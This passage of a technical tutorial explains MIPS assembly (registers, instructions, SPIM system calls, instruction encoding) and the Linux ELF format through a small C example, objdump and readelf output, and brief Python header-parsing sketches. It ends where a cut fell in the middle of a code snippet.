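fp: Different compilers interpret this register differently. The GNU MIPS C compiler uses it as a frame pointer that points to the first word of the procedure frame (one function's frame) on the stack; the function can use offsets from it to access local variables in the stack frame, and sp can then move more freely because fp is used to restore it before the function exits. The SGI C compiler instead uses this register directly as s8, giving the compiler one more saved register.
ra: Holds, during a function call, the address of the instruction to execute after the callee returns. In assembly, a function call has the form jal function_X. The jal (jump-and-link) instruction stores the return address in ra (the address of the current instruction + 4 in this simplified view; on hardware with a branch delay slot it is + 8) and then jumps to the address of function_X. Correspondingly, the most common instruction for returning from a function is jr ra. ra is also very useful for debugging: its value can be inspected at any moment to trace where the CPU has been.

Finally, when writing pure assembly, all of these registers except zero can basically be used as ordinary registers for holding data (this is why they are defined as "general-purpose registers", unlike the registers of coprocessors or peripherals, whose functions are fixed at the factory). So why are there so many rules? They form an ABI (Application Binary Interface) that the MIPS developers designed so that their processors could run high-level languages such as C and Java, and so that assembly and high-level languages could be mixed safely. Designers of different compilers have a common basis to follow, and system programmers can read and modify assembly code more easily by relying on these conventions.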

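Program Structure

A program is just a plain text file with data declarations and program code (the file name should end in the suffix .s, or .asm)
The data declaration section is followed by the program code section

Data Declarations

Placed in the section identified with the assembler directive .data
Declares variable names used in the program; storage is allocated in memory

Code

Placed in the section of text identified with the assembler directive .text
Contains the program code (instructions)
The starting point for code execution is given the label main (as in C)
The end of main should use the exit system call (see System Calls below)

Comments

# marks a single-line comment

Anything following # on a line is treated as a comment

Template for a MIPS assembly language program:

# Comment giving the name of the program and a description of its function
# Template.s
# Bare-bones outline of a MIPS assembly language program

            .data       # variable declarations follow this line
                        # ...
            .text       # instructions follow this line

main:                   # indicates the start of code (first instruction to execute)
                        # ...

# End of program; leave a blank line afterwards to make SPIM happy.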

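Variable Declarations

Format for declarations:

name: storage_type value(s)

Creates storage for a variable of the specified type with the given name and specified value

value(s) usually gives the initial value(s); for the storage type .space, it gives the number of bytes to allocate

Note: labels are always followed by a colon (:)

Examples

var1:   .word 3        # create a single integer variable with initial value 3
array1: .byte 'a','b'  # create a 2-element character array with elements initialized to a and b

array2: .space 40      # allocate 40 consecutive bytes of uninitialized storage, which could be used
                       # as a 40-element character array or a 10-element integer array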

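Load/Store Instructions

RAM access is only allowed through load and store instructions
All other instructions use register operands

load:

lw register_destination, RAM_source
# Copy a word (4 bytes) at the source RAM location to the destination register (the w in lw stands for word)
lb register_destination, RAM_source
# Copy a byte at the source RAM location to the low-order byte of the destination register, sign-extending it into the higher-order bytes (lb stands for load byte)

store:

sw register_source, RAM_destination
# Store the word in the source register into the RAM destination
sb register_source, RAM_destination
# Store the low-order byte of the source register into the RAM destination

load immediate:

li register_destination, value
# Load an immediate value into the destination register (li stands for load immediate)

Example

       .data
var1:  .word  23            # declare storage for var1; initial value is 23

       .text
__start:
       lw     $t0, var1            # load the contents of the RAM location into register $t0:  $t0 = var1
       li     $t1, 5               #  $t1 = 5   ("load immediate")
       sw     $t1, var1            # store the contents of register $t1 into RAM:  var1 = $t1
       done                        # placeholder for program exit (see the system calls below)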

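Indirect and Based Addressing

Used only with load and store instructions

Load address:

       la $t0, var1

Copies the RAM address of var1 (presumably a label defined in the program) into register $t0

Indirect addressing, where the address is the contents of a register, like a pointer:

       lw $t2, ($t0)

Loads the word at the RAM address contained in $t0 into $t2

       sw $t2, ($t0)

Stores the word in register $t2 into RAM at the address contained in $t0

Based or indexed addressing (offset from a register):

       lw $t2, 4($t0)

Loads the word at RAM address ($t0 + 4) into register $t2
"4" gives the offset from the address in register $t0

       sw $t2, -12($t0)

Stores the word in register $t2 into RAM at address ($t0 - 12)
Negative offsets are fine

Note: based addressing is especially useful for:
Arrays: elements are accessed as an offset from the base address
Stacks: elements are easy to access at an offset from the stack pointer or frame pointer

Example

              .data
 array1:      .space 12            #  declare 12 bytes of storage for array1, enough to hold 3 integers
              .text
 __start:     la     $t0, array1          #  load the base address of the array into $t0
              li     $t1, 5               #  $t1 = 5   ("load immediate")
              sw $t1, ($t0)               #  first array element set to 5 via indirect addressing; array1[0] = $t1 = 5
              li $t1, 13                  #  $t1 = 13
              sw $t1, 4($t0)              #  second array element set to 13; array1[1] = $t1 = 13
              # elements are spaced by the size of their data type, 4 bytes here, so array1 + 4 is array1[1]
              li $t1, -7                  #  $t1 = -7
              sw $t1, 8($t0)              #  third array element set to -7
              # array1 + 8 = (address(array1[0]) + 4) + 4 = address(array1[1]) + 4 = address(array1[2])
              done                        #  placeholder for program exit (see the system calls below)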
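The offset arithmetic in the array example above can be replayed in Python with a byte buffer standing in for RAM. The helper names `sw` and `lw` are borrowed from the instructions as labels only, and the little-endian byte order is an assumption (MIPS can be configured either way).

```python
import struct

def sw(memory, value, offset, base=0):
    """Model `sw reg, offset(base)`: store a signed 32-bit word at base + offset."""
    struct.pack_into("<i", memory, base + offset, value)

def lw(memory, offset, base=0):
    """Model `lw reg, offset(base)`: load the signed 32-bit word at base + offset."""
    return struct.unpack_from("<i", memory, base + offset)[0]

array1 = bytearray(12)   # like: array1: .space 12
sw(array1, 5, 0)         # array1[0] = 5
sw(array1, 13, 4)        # array1[1] = 13, at byte offset 4
sw(array1, -7, 8)        # array1[2] = -7, at byte offset 8

print([lw(array1, off) for off in (0, 4, 8)])  # [5, 13, -7]
```

Element i of a word array lives at byte offset 4 * i, which is why the stores use offsets 0, 4, and 8.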

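Arithmetic Instructions

Most use 3 operands
All operands are registers; no RAM or indirect addressing
Operand size is a word (4 bytes): 32 bits = 4 * 8 bits = 4 bytes = 1 word

add    $t0,$t1,$t2   #  $t0 = $t1 + $t2; add as signed (2's complement) integers
sub    $t2,$t3,$t4   #  $t2 = $t3 - $t4
addi   $t2,$t3, 5    #  $t2 = $t3 + 5; "add immediate"
addu   $t1,$t6,$t7   #  $t1 = $t6 + $t7; add as unsigned integers
subu   $t1,$t6,$t7   #  $t1 = $t6 - $t7; subtract as unsigned integers

mult   $t3,$t4       #  multiply $t3 by $t4; the 64-bit result is stored in Hi (high word) and Lo (low word)
div    $t5,$t6       #  Lo = $t5 / $t6   (integer quotient)
                     #  Hi = $t5 mod $t6   (remainder)
                     #  the quotient is placed in Lo and the remainder in Hi
mfhi   $t0           #  move the value of special register Hi to $t0:   $t0 = Hi
mflo   $t1           #  move the value of special register Lo to $t1:   $t1 = Lo
# Hi and Lo cannot be read directly; mfhi and mflo copy their values to a register

move   $t2,$t3       #  $t2 = $t3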

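Control Structures

Branches (if-else)

The comparison for a conditional branch is built into the instruction

              b    target            # unconditional branch to program label target
              beq  $t0, $t1, target  # branch to target if $t0 = $t1
              blt  $t0, $t1, target  # branch to target if $t0 < $t1
              ble  $t0, $t1, target  # branch to target if $t0 <= $t1
              bgt  $t0, $t1, target  # branch to target if $t0 > $t1
              bge  $t0, $t1, target  # branch to target if $t0 >= $t1
              bne  $t0, $t1, target  # branch to target if $t0 != $t1

Jumps (while, for, goto)

 j     target # unconditional jump to program label target
 jr    $t3    # jump to the address contained in $t3 ("jump register")

Subroutine Calls

Subroutine call: the "jump and link" instruction

       jal sub_label # "jump and link"

Saves the return address (the address of the instruction after the call) in $ra
Jumps to the program statement at sub_label

Subroutine return: the "jump register" instruction

       jr $ra       # "jump register"

Jumps to the return address in $ra (stored by the jal instruction)

Note: the return address is stored in register $ra; if a subroutine calls other subroutines, or is recursive, the return address should be copied from $ra onto the stack to preserve it, since jal always places the return address in this register and hence overwrites the previous value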

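System Calls and I/O (SPIM Simulator)

System calls are used to read or print values or strings from the input/output window, and to indicate the end of the program
Use the syscall operating system routine call
First supply appropriate values in registers $v0 and $a0 - $a1
The result value (if any) is returned in register $v0

The following table lists the available system call services.

Service	Code in `$v0`	Arguments	Result
print_int	`$v0` = 1	`$a0` = integer to be printed
print_float	`$v0` = 2	`$f12` = float to be printed
print_double	`$v0` = 3	`$f12` = double to be printed
print_string	`$v0` = 4	`$a0` = address of the string to be printed
read_int	`$v0` = 5		`$v0` = integer read
read_float	`$v0` = 6		`$f0` = float read
read_double	`$v0` = 7		`$f0` = double read
read_string	`$v0` = 8	`$a0` = address of the input buffer; `$a1` = length of the buffer (n)
sbrk (like the C `sbrk()` function)	`$v0` = 9	`$a0` = number of bytes to allocate	`$v0` = address of the allocated block
exit	`$v0` = 10

- The print_string service expects the address of a null-terminated string. The directive .asciiz creates a null-terminated character string.
- The read_int, read_float, and read_double services read an entire line of input, up to and including the newline character \n.
- The read_string service has the same semantics as the UNIX library routine fgets.
  - It reads up to n-1 characters into the buffer and terminates the string with a null character.
  - If the current line has fewer than n-1 characters, it reads up to and including the newline and terminates the string with a null character.
  - In short, input that is too long is truncated, shorter input is taken as is, and a terminator is always appended.
- The sbrk service returns the address of a block of memory containing n additional bytes. This is used for dynamic memory allocation.
- The exit service stops the program from running.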
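Example: print the integer stored in $t2

 li $v0, 1      # load the service code 1 (print_int) into $v0
 move $a0, $t2  # move the integer to be printed into $a0
 syscall        # ask the operating system to perform the operation

Example: read an integer and store it in RAM in the variable int_value

li $v0, 5            # load the service code 5 (read_int) into $v0
syscall              # ask the operating system to perform the operation; afterwards $v0 holds the integer read
sw $v0, int_value    # store the value read into RAM with the store word instruction

Example: print a string (this one is complete; the examples above can be dropped into the main: part and run as well)

              .data
 string1:     .asciiz       "Print this.\n"    # declaration for the string variable
                                               # the .asciiz directive makes the string null-terminated

              .text
 main: li     $v0, 4               # load the appropriate system call code into register $v0
                                   # the code for printing a string is 4
              la     $a0, string1  # load the address of the string to be printed into $a0
              syscall              # ask the operating system to perform the print operation


 To indicate the end of the program, use the exit system call; the last lines of the program should therefore be:
              li     $v0, 10       # system call code for exit = 10 (see the table above)
              syscall              # ask the operating system to end the program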

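Supplement: MIPS Instruction Formats

R format

6	5	5	5	5	6
op	rs	rt	rd	shamt	funct

Use: register-to-register ALU operations; reading and writing special registers

I format

6	5	5	16
op	rs	rt	immediate

Use: load/store of byte, halfword, word, and doubleword; conditional branches; jump, jump and link register

J format

6	26
op	jump address

Use: jump, jump and link; trap and return from exception

Meaning of each field:
op: the basic operation of the instruction, called the opcode.
rs: the first source operand register.
rt: the second source operand register.
rd: the destination register that receives the result.
shamt: the shift amount.
funct: the function code; this field selects a specific variant of the operation in op.

Example:

add $t0,$s0,$s1

This means $t0 = $s0 + $s1: the contents of register 16 (s0) and register 17 (s1) are added, and the result is placed in register 8 (t0). The fields of the instruction in decimal are:

0	16	17	8	0	32

op = 0 and funct = 32 indicate an addition. 16 = $s0 means the first source operand (rs) is in register 16, 17 = $s1 means the second source operand (rt) is in register 17, and 8 = $t0 means the destination operand (rd) is register 8. Writing each field in binary gives:

000000	10000	10001	01000	00000	100000

This is the machine code of the instruction above; as you can see, it is very regular.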
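The field packing above can be reproduced with a few shifts. This is a minimal sketch; the function name `encode_r` is hypothetical, and the field widths are the 6/5/5/5/5/6 layout from the R-format table.

```python
def encode_r(op, rs, rt, rd, shamt, funct):
    """Pack the six R-format fields (6/5/5/5/5/6 bits) into one 32-bit word."""
    return (op << 26) | (rs << 21) | (rt << 16) | (rd << 11) | (shamt << 6) | funct

# add $t0, $s0, $s1  ->  op=0, rs=16 ($s0), rt=17 ($s1), rd=8 ($t0), shamt=0, funct=32
word = encode_r(0, 16, 17, 8, 0, 32)
print(f"{word:032b}")  # 00000010000100010100000000100000
print(f"{word:#010x}")  # 0x02114020
```

Splitting the printed bit string into groups of 6, 5, 5, 5, 5, and 6 bits gives back the binary fields listed above.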

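Supplement: Commonly Used MIPS Instructions

lb/lh/lw: load a byte / halfword / word from memory into a register, e.g. lb $1, 0($2)

sb/sh/sw: store a byte / halfword / word from a register into memory, e.g. sb $1, 0($2)

add/addu: add the contents of two registers, e.g. add $1,$2,$3 ($1 = $2 + $3); the u ("unsigned") variant does not trap on overflow

addi/addiu: add an immediate to the contents of a register, e.g. addi $1,$2,3 ($1 = $2 + 3); the u variant does not trap on overflow

sub/subu: subtract the contents of two registers

div/divu: divide the contents of two registers

mult/multu: multiply the contents of two registers

and/andi: bitwise AND, e.g. and $1,$2,$3 ($1 = $2 & $3); the i variant takes an immediate

or/ori: bitwise OR

xor/xori: bitwise exclusive OR

beq/beqz/bnez/bne: conditional branches; eq means equal, z means zero, ne means not equal

j/jr/jal/jalr: j jumps directly; jr jumps to the address in a register; jal and jalr also save the return address

lui: place a 16-bit immediate in the upper 16 bits of a register and fill the lower 16 bits with zeros

sll/srl: logical shift left / right, e.g. sll $1,$2,2

slt/slti/sltiu: set on less than, e.g. slt $1,$2,$3 sets $1 to 1 if the value of $2 is less than that of $3, and to 0 otherwise

move/movz/movn: copy; z means "if zero" and n means "if not zero", e.g. move $1,$2; movz $1,$2,$3 (copy $2 to $1 if $3 is zero)

trap: enter supervisor mode through the address vector

eret: return from an exception to user mode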

Linux ELF

An example

In Section 1.5.1, C Language Basics, we saw the whole process from source code to executable file. Now let's look at a more complex example.

#include<stdio.h>

int global_init_var = 10;
int global_uninit_var;

void func(int sum) {
    printf("%d\n", sum);
}

void main(void) {
    static int local_static_init_var = 20;
    static int local_static_uninit_var;

    int local_init_val = 30;
    int local_uninit_var;

    func(global_init_var + local_init_val +
         local_static_init_var );
}

Then run the following commands to generate three files:

gcc -m32 -c elfDemo.c -o elfDemo.o

gcc -m32 elfDemo.c -o elfDemo.out

gcc -m32 -static elfDemo.c -o elfDemo_static.out

Use the ldd command to print the shared libraries each file depends on:

$ ldd elfDemo.out
        linux-gate.so.1 (0xf77b1000)
        libc.so.6 => /usr/lib32/libc.so.6 (0xf7597000)
        /lib/ld-linux.so.2 => /usr/lib/ld-linux.so.2 (0xf77b3000)
$ ldd elfDemo_static.out
        not a dynamic executable

elfDemo_static.out is statically linked.

Use the file command to inspect the file formats:

$ file elfDemo.o
elfDemo.o: ELF 32-bit LSB relocatable, Intel 80386, version 1 (SYSV), not stripped

$ file elfDemo.out
elfDemo.out: ELF 32-bit LSB shared object, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=50036015393a99344897cbf34099256c3793e172, not stripped

$ file elfDemo_static.out
elfDemo_static.out: ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, for GNU/Linux 3.2.0, BuildID[sha1]=276c839c20b4c187e4b486cf96d82a90c40f4dae, not stripped

$ file -L /usr/lib32/libc.so.6
/usr/lib32/libc.so.6: ELF 32-bit LSB shared object, Intel 80386, version 1 (GNU/Linux), dynamically linked, interpreter /usr/lib32/ld-linux.so.2, BuildID[sha1]=ee88d1b2aa81f104ab5645d407e190b244203a52, for GNU/Linux 3.2.0, not stripped

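This gives us the three types of ELF (Executable and Linkable Format) files, the Linux executable file format:

Relocatable file
- Contains code and data, and can be linked with other object files to produce an executable or a shared object file.
- elfDemo.o
Executable file
- Contains a program that can be executed directly.
- elfDemo_static.out
Shared object file
- Contains code and data for linking, in two scenarios. In the first, the link editor combines it with other relocatable and shared object files to produce a new object file. In the second, the dynamic linker combines several shared object files with an executable as part of a process image.
- elfDemo.out
- libc-2.25.so

Their structure at this point is shown in the figure:

As you can see, this simplified ELF file begins with a file header, followed by the code section, the data section, and the .bss section. After the source code is compiled, executable statements become machine instructions stored in .text; initialized global variables and local static variables are stored in .data; uninitialized global variables and local static variables go in .bss.

Storing program instructions and program data separately has many benefits. From a security standpoint, once the program is loaded, data and instructions are mapped to two separate virtual memory regions. The data region is readable and writable by the process while the instruction region is read-only, so the permissions of the two regions can be set to read-write and read-only respectively, which prevents the program's instructions from being overwritten and abused.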

elfDemo.o

Next, let's explore the object file in more depth, using objdump to view its internal structure:

$ objdump -h elfDemo.o

elfDemo.o:     file format elf32-i386

Sections:
Idx Name          Size      VMA       LMA       File off  Algn
  0 .group        00000008  00000000  00000000  00000034  2**2
                  CONTENTS, READONLY, GROUP, LINK_ONCE_DISCARD
  1 .text         00000078  00000000  00000000  0000003c  2**0
                  CONTENTS, ALLOC, LOAD, RELOC, READONLY, CODE
  2 .data         00000008  00000000  00000000  000000b4  2**2
                  CONTENTS, ALLOC, LOAD, DATA
  3 .bss          00000004  00000000  00000000  000000bc  2**2
                  ALLOC
  4 .rodata       00000004  00000000  00000000  000000bc  2**0
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
  5 .text.__x86.get_pc_thunk.ax 00000004  00000000  00000000  000000c0  2**0
                  CONTENTS, ALLOC, LOAD, READONLY, CODE
  6 .comment      00000012  00000000  00000000  000000c4  2**0
                  CONTENTS, READONLY
  7 .note.GNU-stack 00000000  00000000  00000000  000000d6  2**0
                  CONTENTS, READONLY
  8 .eh_frame     0000007c  00000000  00000000  000000d8  2**2
                  CONTENTS, ALLOC, LOAD, RELOC, READONLY, DATA

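Besides the basic code, data, and BSS sections, the object file contains several others. Note that .bss lacks the CONTENTS attribute, meaning it occupies no space in the file; .bss merely reserves room for uninitialized global variables and local static variables.

Code section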

$ objdump -x -s -d elfDemo.o
......
Sections:
Idx Name          Size      VMA       LMA       File off  Algn

......

  1 .text         00000078  00000000  00000000  0000003c  2**0
                  CONTENTS, ALLOC, LOAD, RELOC, READONLY, CODE
......
Contents of section .text:
 0000 5589e553 83ec04e8 fcffffff 05010000  U..S............
 0010 0083ec08 ff75088d 90000000 005289c3  .....u.......R..
 0020 e8fcffff ff83c410 908b5dfc c9c38d4c  ..........]....L
 0030 240483e4 f0ff71fc 5589e551 83ec14e8  $.....q.U..Q....
 0040 fcffffff 05010000 00c745f4 1e000000  ..........E.....
 0050 8b880000 00008b55 f401ca8b 80040000  .......U........
 0060 0001d083 ec0c50e8 fcffffff 83c41090  ......P.........
 0070 8b4dfcc9 8d61fcc3                    .M...a..
......
Disassembly of section .text:

00000000 <func>:
   0:   55                      push   %ebp
   1:   89 e5                   mov    %esp,%ebp
   3:   53                      push   %ebx
   4:   83 ec 04                sub    $0x4,%esp
   7:   e8 fc ff ff ff          call   8 <func+0x8>
                        8: R_386_PC32   __x86.get_pc_thunk.ax
   c:   05 01 00 00 00          add    $0x1,%eax
                        d: R_386_GOTPC  _GLOBAL_OFFSET_TABLE_
  11:   83 ec 08                sub    $0x8,%esp
  14:   ff 75 08                pushl  0x8(%ebp)
  17:   8d 90 00 00 00 00       lea    0x0(%eax),%edx
                        19: R_386_GOTOFF        .rodata
  1d:   52                      push   %edx
  1e:   89 c3                   mov    %eax,%ebx
  20:   e8 fc ff ff ff          call   21 <func+0x21>
                        21: R_386_PLT32 printf
  25:   83 c4 10                add    $0x10,%esp
  28:   90                      nop
  29:   8b 5d fc                mov    -0x4(%ebp),%ebx
  2c:   c9                      leave  
  2d:   c3                      ret

0000002e <main>:
  2e:   8d 4c 24 04             lea    0x4(%esp),%ecx
  32:   83 e4 f0                and    $0xfffffff0,%esp
  35:   ff 71 fc                pushl  -0x4(%ecx)
  38:   55                      push   %ebp
  39:   89 e5                   mov    %esp,%ebp
  3b:   51                      push   %ecx
  3c:   83 ec 14                sub    $0x14,%esp
  3f:   e8 fc ff ff ff          call   40 <main+0x12>
                        40: R_386_PC32  __x86.get_pc_thunk.ax
  44:   05 01 00 00 00          add    $0x1,%eax
                        45: R_386_GOTPC _GLOBAL_OFFSET_TABLE_
  49:   c7 45 f4 1e 00 00 00    movl   $0x1e,-0xc(%ebp)
  50:   8b 88 00 00 00 00       mov    0x0(%eax),%ecx
                        52: R_386_GOTOFF        global_init_var
  56:   8b 55 f4                mov    -0xc(%ebp),%edx
  59:   01 ca                   add    %ecx,%edx
  5b:   8b 80 04 00 00 00       mov    0x4(%eax),%eax
                        5d: R_386_GOTOFF        .data
  61:   01 d0                   add    %edx,%eax
  63:   83 ec 0c                sub    $0xc,%esp
  66:   50                      push   %eax
  67:   e8 fc ff ff ff          call   68 <main+0x3a>
                        68: R_386_PC32  func
  6c:   83 c4 10                add    $0x10,%esp
  6f:   90                      nop
  70:   8b 4d fc                mov    -0x4(%ebp),%ecx
  73:   c9                      leave  
  74:   8d 61 fc                lea    -0x4(%ecx),%esp
  77:   c3                      ret

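Contents of section .text is the hexadecimal dump of .text, 0x78 bytes in total: the leftmost column is the offset, the middle four columns are the contents, and the rightmost column is the ASCII rendering. The Disassembly of section .text that follows is the disassembly.

Data and read-only data sections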

......
Sections:
Idx Name          Size      VMA       LMA       File off  Algn
  2 .data         00000008  00000000  00000000  000000b4  2**2
                  CONTENTS, ALLOC, LOAD, DATA
  4 .rodata       00000004  00000000  00000000  000000bc  2**0
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
......
Contents of section .data:
 0000 0a000000 14000000                    ........
Contents of section .rodata:
 0000 25640a00                             %d..
.......

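.data holds initialized global variables and local static variables. elfDemo.c has two of them, global_init_var and local_static_init_var, 4 bytes each, 8 bytes in total. Because of little-endian byte order, 0a000000 is the value of global_init_var (10, hex 0x0a) and 14000000 is the value of local_static_init_var (20, hex 0x14).

.rodata holds read-only data, including read-only variables and string constants. The printf call in elfDemo.c uses the string constant %d\n, which is read-only data stored in .rodata; the output shows the string constant in ASCII form, terminated by \0.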
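
The little-endian decoding of these two dumps can be reproduced with Python's struct module. This is only a sketch that reinterprets the hex bytes shown in the objdump output; the variable names are chosen to mirror elfDemo.c.

```python
import struct

# Bytes copied from "Contents of section .data" and ".rodata" above
data_section = bytes.fromhex("0a00000014000000")
rodata_section = bytes.fromhex("25640a00")

# "<ii" = two little-endian signed 32-bit integers
global_init_var, local_static_init_var = struct.unpack("<ii", data_section)

# The format string runs up to its terminating null byte
format_string = rodata_section.split(b"\0")[0].decode("ascii")

print(global_init_var, local_static_init_var, repr(format_string))
```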

BSS section

Sections:
Idx Name          Size      VMA       LMA       File off  Algn
  3 .bss          00000004  00000000  00000000  000000bc  2**2
                  ALLOC

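.bss holds uninitialized global variables and local static variables. Here it is 4 bytes, the size of local_static_uninit_var; global_uninit_var is still an unallocated COMMON symbol in the object file (Ndx COM in the symbol table shown later).

ELF file structure

Object files participate in both program linking (building a program) and program execution (running a program). The ELF structures and related definitions can be found in /usr/include/elf.h.

- The ELF header sits at the very beginning of the object file and describes the basic attributes of the whole file.
- The program header table is optional; it tells the system how to create a process image. Executable files must have a program header table, while relocatable files do not need one.
- Sections hold the bulk of the object file information for the linking view.
- The section header table describes all the sections in the file.

32-bit data types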

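Name	Size (bytes)	Alignment	Description	Underlying type
Elf32_Addr	4	4	Unsigned program address	uint32_t
Elf32_Half	2	2	Unsigned short integer	uint16_t
Elf32_Off	4	4	Unsigned file offset	uint32_t
Elf32_Sword	4	4	Signed integer	int32_t
Elf32_Word	4	4	Unsigned integer	uint32_t

File header

The ELF header is always at the start of an ELF file and identifies the file as ELF. It is defined as follows: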

typedef struct
{
  unsigned char e_ident[EI_NIDENT]; /* Magic number and other info */
  Elf32_Half    e_type;         /* Object file type */
  Elf32_Half    e_machine;      /* Architecture */
  Elf32_Word    e_version;      /* Object file version */
  Elf32_Addr    e_entry;        /* Entry point virtual address */
  Elf32_Off e_phoff;        /* Program header table file offset */
  Elf32_Off e_shoff;        /* Section header table file offset */
  Elf32_Word    e_flags;        /* Processor-specific flags */
  Elf32_Half    e_ehsize;       /* ELF header size in bytes */
  Elf32_Half    e_phentsize;        /* Program header table entry size */
  Elf32_Half    e_phnum;        /* Program header table entry count */
  Elf32_Half    e_shentsize;        /* Section header table entry size */
  Elf32_Half    e_shnum;        /* Section header table entry count */
  Elf32_Half    e_shstrndx;     /* Section header string table index */
} Elf32_Ehdr;

typedef struct
{
  unsigned char e_ident[EI_NIDENT]; /* Magic number and other info */
  Elf64_Half    e_type;         /* Object file type */
  Elf64_Half    e_machine;      /* Architecture */
  Elf64_Word    e_version;      /* Object file version */
  Elf64_Addr    e_entry;        /* Entry point virtual address */
  Elf64_Off e_phoff;        /* Program header table file offset */
  Elf64_Off e_shoff;        /* Section header table file offset */
  Elf64_Word    e_flags;        /* Processor-specific flags */
  Elf64_Half    e_ehsize;       /* ELF header size in bytes */
  Elf64_Half    e_phentsize;        /* Program header table entry size */
  Elf64_Half    e_phnum;        /* Program header table entry count */
  Elf64_Half    e_shentsize;        /* Section header table entry size */
  Elf64_Half    e_shnum;        /* Section header table entry count */
  Elf64_Half    e_shstrndx;     /* Section header string table index */
} Elf64_Ehdr;

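e_ident holds the ELF magic number and other information. The first four bytes are the magic number, written as the string \177ELF. The next byte is the file class: ELFCLASS32 (1) for 32-bit or ELFCLASS64 (2) for 64-bit. The byte after that is the data encoding: ELFDATA2LSB (1) for little-endian or ELFDATA2MSB (2) for big-endian. The following byte is the ELF version.

Now let's use the readelf command to view the file header of elfDemo.out: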

$ readelf -h elfDemo.out
ELF Header:
  Magic:   7f 45 4c 46 01 01 01 00 00 00 00 00 00 00 00 00
  Class:                             ELF32
  Data:                              2's complement, little endian
  Version:                           1 (current)
  OS/ABI:                            UNIX - System V
  ABI Version:                       0
  Type:                              DYN (Shared object file)
  Machine:                           Intel 80386
  Version:                           0x1
  Entry point address:               0x3e0
  Start of program headers:          52 (bytes into file)
  Start of section headers:          6288 (bytes into file)
  Flags:                             0x0
  Size of this header:               52 (bytes)
  Size of program headers:           32 (bytes)
  Number of program headers:         9
  Size of section headers:           40 (bytes)
  Number of section headers:         30
  Section header string table index: 29
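
To connect the readelf output with the Elf32_Ehdr definition, the sketch below unpacks a 52-byte header with Python's struct module. It assumes a 32-bit little-endian file; the sample bytes are rebuilt from the values printed above rather than read from a real elfDemo.out, and `parse_ehdr32` is a name invented for this illustration.

```python
import struct

# Little-endian layout of Elf32_Ehdr: e_ident[16], 2 Half, 5 Word/Addr/Off, 6 Half
EHDR32 = struct.Struct("<16sHHIIIIIHHHHHH")
FIELDS = (
    "e_ident", "e_type", "e_machine", "e_version", "e_entry", "e_phoff",
    "e_shoff", "e_flags", "e_ehsize", "e_phentsize", "e_phnum",
    "e_shentsize", "e_shnum", "e_shstrndx",
)


def parse_ehdr32(data: bytes) -> dict:
    """Decode the first 52 bytes of a 32-bit little-endian ELF file."""
    hdr = dict(zip(FIELDS, EHDR32.unpack_from(data)))
    ident = hdr["e_ident"]
    if ident[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    hdr["class"] = {1: "ELF32", 2: "ELF64"}.get(ident[4], "unknown")
    hdr["data"] = {1: "little endian", 2: "big endian"}.get(ident[5], "unknown")
    hdr["ident_version"] = ident[6]
    return hdr


# Header rebuilt from the readelf -h output (type DYN = 3, machine Intel 80386 = 3)
sample = EHDR32.pack(
    bytes.fromhex("7f454c46010101000000000000000000"),
    3, 3, 1, 0x3E0, 52, 6288, 0, 52, 32, 9, 40, 30, 29,
)
hdr = parse_ehdr32(sample)
print(hdr["class"], hdr["data"], hex(hdr["e_entry"]), hdr["e_phnum"], hdr["e_shnum"])
```

For a real file, the same function could be applied to the first 52 bytes read in binary mode, provided the file really is 32-bit little-endian.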

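Program header

The program header table is an array located at the file offset given by e_phoff in the ELF header; its size is determined by e_phentsize and e_phnum together. e_phentsize is the size of one program header entry and e_phnum is the number of entries.

The program header is defined as follows: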

typedef struct
{
  Elf32_Word    p_type;         /* Segment type */
  Elf32_Off p_offset;       /* Segment file offset */
  Elf32_Addr    p_vaddr;        /* Segment virtual address */
  Elf32_Addr    p_paddr;        /* Segment physical address */
  Elf32_Word    p_filesz;       /* Segment size in file */
  Elf32_Word    p_memsz;        /* Segment size in memory */
  Elf32_Word    p_flags;        /* Segment flags */
  Elf32_Word    p_align;        /* Segment alignment */
} Elf32_Phdr;

typedef struct
{
  Elf64_Word    p_type;         /* Segment type */
  Elf64_Word    p_flags;        /* Segment flags */
  Elf64_Off p_offset;       /* Segment file offset */
  Elf64_Addr    p_vaddr;        /* Segment virtual address */
  Elf64_Addr    p_paddr;        /* Segment physical address */
  Elf64_Xword   p_filesz;       /* Segment size in file */
  Elf64_Xword   p_memsz;        /* Segment size in memory */
  Elf64_Xword   p_align;        /* Segment alignment */
} Elf64_Phdr;

Use readelf to view the program headers:

$ readelf -l elfDemo.out

Elf file type is DYN (Shared object file)
Entry point 0x3e0
There are 9 program headers, starting at offset 52

Program Headers:
  Type           Offset   VirtAddr   PhysAddr   FileSiz MemSiz  Flg Align
  PHDR           0x000034 0x00000034 0x00000034 0x00120 0x00120 R E 0x4
  INTERP         0x000154 0x00000154 0x00000154 0x00013 0x00013 R   0x1
      [Requesting program interpreter: /lib/ld-linux.so.2]
  LOAD           0x000000 0x00000000 0x00000000 0x00780 0x00780 R E 0x1000
  LOAD           0x000ef4 0x00001ef4 0x00001ef4 0x00130 0x0013c RW  0x1000
  DYNAMIC        0x000efc 0x00001efc 0x00001efc 0x000f0 0x000f0 RW  0x4
  NOTE           0x000168 0x00000168 0x00000168 0x00044 0x00044 R   0x4
  GNU_EH_FRAME   0x000624 0x00000624 0x00000624 0x00044 0x00044 R   0x4
  GNU_STACK      0x000000 0x00000000 0x00000000 0x00000 0x00000 RW  0x10
  GNU_RELRO      0x000ef4 0x00001ef4 0x00001ef4 0x0010c 0x0010c R   0x1

 Section to Segment mapping:
  Segment Sections...
   00
   01     .interp
   02     .interp .note.ABI-tag .note.gnu.build-id .gnu.hash .dynsym .dynstr .gnu.version .gnu.version_r .rel.dyn .rel.plt .init .plt .plt.got .text .fini .rodata .eh_frame_hdr .eh_frame
   03     .init_array .fini_array .dynamic .got .got.plt .data .bss
   04     .dynamic
   05     .note.ABI-tag .note.gnu.build-id
   06     .eh_frame_hdr
   07
   08     .init_array .fini_array .dynamic .got
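
A program header entry can be decoded the same way as the file header. The sketch below assumes the 32-bit little-endian Elf32_Phdr layout given above and rebuilds the second LOAD entry from the readelf output; `parse_phdr32` and `flags_to_str` are illustrative names. The difference between p_memsz and p_filesz is the part of the segment that exists only in memory (here the space for .bss).

```python
import struct

PHDR32 = struct.Struct("<8I")            # eight 32-bit fields, 32 bytes in total
PHDR_FIELDS = ("p_type", "p_offset", "p_vaddr", "p_paddr",
               "p_filesz", "p_memsz", "p_flags", "p_align")
PT_LOAD = 1
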